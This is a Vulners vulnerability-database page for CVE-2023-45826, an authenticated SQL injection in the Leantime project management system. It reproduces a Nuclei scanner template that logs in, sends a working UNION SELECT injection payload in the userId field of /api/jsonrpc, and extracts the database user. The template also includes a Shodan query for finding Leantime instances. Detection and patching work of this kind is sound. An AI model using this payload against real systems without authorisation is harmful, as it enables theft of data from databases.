| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2023-45826 | 19 Oct 202322:34 | ā | circl | |
| Leantime Systems Leantime SQL Injection Vulnerability | 19 Oct 202300:00 | ā | cnnvd | |
| CVE-2023-45826 | 19 Oct 202318:28 | ā | cve | |
| CVE-2023-45826 Authenticated SQL Injection in leantime | 19 Oct 202318:28 | ā | cvelist | |
| CVE-2023-45826 | 19 Oct 202319:15 | ā | nvd | |
| CVE-2023-45826 Authenticated SQL Injection in leantime | 19 Oct 202318:28 | ā | osv | |
| Sql injection | 19 Oct 202319:15 | ā | prion | |
| CVE-2023-45826 | 23 May 202502:19 | ā | redhatcve | |
| CVE-2023-45826 Authenticated SQL Injection in leantime | 19 Oct 202318:28 | ā | vulnrichment |
| Source | Link |
|---|---|
| github | www.github.com/advisories/GHSA-c39w-3pjx-qc7m |
id: CVE-2023-45826
info:
name: Leantime < 2.4 - Authenticated SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
impact: |
Authenticated attackers can exploit SQL injection through the userId parameter in the files API to dump database contents, potentially exposing project information, user credentials, and sensitive business data from the Leantime system.
remediation: |
Update Leantime to version 2.4-beta-4 or later that uses parameterized queries for the userId variable in app/domain/files/repositories/class.files.php.
reference:
- https://github.com/advisories/GHSA-c39w-3pjx-qc7m
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-45826
cwe-id: CWE-89
epss-score: 0.01872
epss-percentile: 0.76831
cpe: cpe:2.3:a:leantime:leantime:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: leantime
product: leantime
shodan-query: title:"Leantime"
tags: cve,cve2023,leantime,authenticated,sqli,vuln
variables:
username: "{{username}}"
password: "{{password}}"
marker: "{{randstr}}"
hex_marker: "{{hex_encode(marker)}}"
http:
- raw:
- |
POST /auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
redirectUrl=http%253A%252F%252Fpdt.re%253A8080%252Fdashboard%252Fhome&username={{username}}&password={{password}}&login=Login
matchers:
- type: word
part: body
words:
- /dashboard/home
- raw:
- |
POST /api/jsonrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"method": "leantime.rpc.files.getFilesByModule","jsonrpc": "2.0","id": "1","params": {"userId":"9 union select concat(0x{{hex_marker}},0x3a,user()),2,3,4,5,6,7,8,9,10,11-- -" } }
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Request was successful'
- "{{marker}}"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
internal: false
regex:
- '"\w+:(.*?)\"'
group: 1
# digest: 4b0a00483046022100eec360ba63c71ed0d30716e6e7453ba8205999ddb2633d20727002619807a9ba0221009cb9deff9aa226af91df17dfa2255c43630856ee2d5e715535f76067d704f7d2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation